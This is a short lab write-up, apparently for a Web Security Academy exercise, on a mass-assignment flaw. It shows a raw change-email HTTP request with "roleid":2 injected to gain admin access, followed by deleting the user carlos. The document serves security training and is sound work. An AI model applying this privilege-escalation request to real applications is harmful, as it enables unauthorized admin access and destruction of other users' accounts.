User role can be modified in user profile

Description

This lab has an admin panel at /admin. It’s only accessible to logged-in users with a roleid of 2.

Reproduction and proof of concept

  1. Log in with credentials wiener:peter and access the account page.

  2. Use the provided feature to update the email address associated with your account.

  3. The response contains your role ID.

  4. Send the email submission request to Burp Repeater, add "roleid":2 into the JSON in the request body, and resend it.

POST /my-account/change-email HTTP/1.1
Host: 0ac800ce047e4849c10f5431004d000a.web-security-academy.net
Cookie: session=kuDuAjpjB1Yrs17aMophAZpeAQf8QQLJ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 50
Origin: https://0ac800ce047e4849c10f5431004d000a.web-security-academy.net
Referer: https://0ac800ce047e4849c10f5431004d000a.web-security-academy.net/my-account
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"email":"test@normal-user.net",
"roleid":2
}

  1. The response shows your roleid has changed to 2.

  2. Browse to /admin and delete carlos.

Exploitability

An attacker will need to access the admin panel, and use it to delete the user carlos.